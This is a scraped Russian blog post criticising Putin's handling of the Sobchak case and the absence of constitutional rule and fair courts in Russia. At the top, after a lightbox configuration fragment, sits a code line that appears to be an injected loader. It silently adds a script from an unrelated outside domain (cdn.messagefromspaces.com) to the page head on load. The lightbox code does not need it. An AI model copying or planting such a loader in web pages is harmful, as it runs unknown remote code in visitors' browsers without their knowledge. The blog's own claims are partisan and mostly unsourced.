, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Они знают, что в стране самовластие, но об установлении власти Конституции молчат

11 Июн

СМИ рассказывают о том, что  Путин  стал одним из героев документального фильма «Дело Собчака», рассказывающего о политической судьбе первого мэра Санкт-Петербурга https://ria.ru/politics/20180611/1522519288.html

Путин работал с Собчаком с начала 90-х годов, был заместителем мэра и главой его предвыборного штаба.

Сгубило Собчака то, что он собирался участвовать в выборах президента в 1996 году, но впоследствии отказался от этой идеи. По воспоминаниям Ксении Собчак, московская команда Ельцина начала кампанию по травле ее отца. Против Собчака возбудили дела о коррупции и злоупотреблении полномочиями.

Путин помог Собчаку покинуть страну, чтобы экс-мэра не захлестнула клеветническая компания.

Прошло более двадцати лет. Смелый и решительный Путин так и  не назвал имена тех, кто  «из команды Ельцина»,  начал  компанию по травле мэра Санкт-Петербурга.

Никто из чиновников, неправомерно возбудивших уголовное дело «о коррупции и злоупотреблениях полномочиями», никакого наказания не понёс.

Если такое происходит с мэром, то чего можно ожидать  рядовым гражданам страны?

Но поражает не это, а то, что  Путин, являясь  много лет гарантом Конституции, ничего не сделал для установления в стране власти Конституции,  обеспеченной её гарантом  и правосудием.

Неужели «команда Путина», а не сам он, повинна в том, что в стране уже около 70% осуждают, не проверяя и не исследуя собранные по делу доказательства, основывая приговоры только на признании обвиняемым того обвинения, что ему предъявили?

В стране за два года  правоохранители обобрали 500 000 предпринимателей, неправомерно возбудив уголовные дела, но никто и  за это  произвол не наказан.

Фильм Ксении Собчак поднимает важную тему об отсутствии в России защиты от неправомерных обвинений. Однако анализ предвыборной программы Ксении на должность президента России, показывает, что и она не стремится к установлению в стране власти Конституции.

В стране «правозащитники» разворачивают компанию по защите украинского кинорежиссёра Олега Сенцова, отбывающего наказание за терроризм. Но этих «правозащитников» вовсе не волнует судьба тысяч людей, что заключают под стражу, не проверив законность предъявленного им обвинения.

Глухи они и к тому, что в стране нет правосудия, как виде государственной деятельности, осуществляемой в особом порядке, установленном Конституцией и процессуальным законодательством.

Они твердят о независимости судей, забывая о том, что прямо в Конституции России указано, что судьи зависимы, от  требований Основного Закона страны. Однако ни Путин, ни его многочисленные контролирующие и надзирающие структуры, не обеспечивают исполнения того, что  предписывает Конституция.

Надежду на будущее даёт то, что к россиянам приходит осознание того, что России нужен не новый лидер, а способный установить власть Конституции и правосудие. Тогда и излишними будут общения главы государства с желающими дозвониться до него.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.